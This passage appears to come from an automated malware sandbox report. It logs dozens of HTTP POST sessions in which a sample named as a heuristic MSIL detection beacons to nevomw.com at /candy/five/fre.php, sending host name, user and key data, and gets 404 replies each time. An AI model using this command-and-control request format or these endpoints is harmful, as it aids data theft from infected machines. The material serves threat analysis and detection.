                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            137192.168.2.64988245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:47.221801043 CET1505OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:47.275233030 CET1506OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:47.351135015 CET1506INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            138192.168.2.64988345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:47.662367105 CET1507OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:47.715826035 CET1507OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:47.791692972 CET1507INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            139192.168.2.64988445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:48.086473942 CET1508OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.138742924 CET1509OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:48.211004972 CET1509INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            14192.168.2.64972745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:48.881874084 CET90OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.933732033 CET91OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.007215023 CET91INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            140192.168.2.64988545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:48.497369051 CET1510OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.552340984 CET1510OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:48.626811028 CET1510INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            141192.168.2.64988645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:48.930011034 CET1511OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.983072996 CET1511OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.073543072 CET1512INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            142192.168.2.64988745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:49.346885920 CET1513OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:49.399409056 CET1513OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.473378897 CET1513INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            143192.168.2.64988845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:49.720684052 CET1514OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:49.773900032 CET1514OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.851969004 CET1515INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            144192.168.2.64988945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:50.131951094 CET1516OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:50.186764002 CET1516OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:50.264707088 CET1516INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            145192.168.2.64989045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:50.537655115 CET1517OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:50.591460943 CET1517OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:50.667494059 CET1518INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            146192.168.2.64989145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:50.981117964 CET1519OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.033487082 CET1519OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:51.109476089 CET1519INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            147192.168.2.64989245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:51.500957966 CET1520OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.554539919 CET1520OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:51.629139900 CET1521INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            148192.168.2.64989445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:51.875500917 CET1521OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.928212881 CET1522OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.001681089 CET1522INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            149192.168.2.64989545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:52.299953938 CET1523OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:52.352369070 CET1523OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.427256107 CET1524INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            15192.168.2.64972845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:49.288846016 CET92OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:49.344322920 CET92OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.418236971 CET92INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            150192.168.2.64989645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:52.669431925 CET1524OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:52.721806049 CET1525OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.793745995 CET1525INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            151192.168.2.64989845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:53.093415022 CET1526OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.146281958 CET1526OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:53.221690893 CET1526INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            152192.168.2.64989945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:53.485192060 CET1527OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.537513018 CET1528OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:53.608858109 CET1528INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            153192.168.2.64990045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:53.899708033 CET1529OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.952516079 CET1529OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
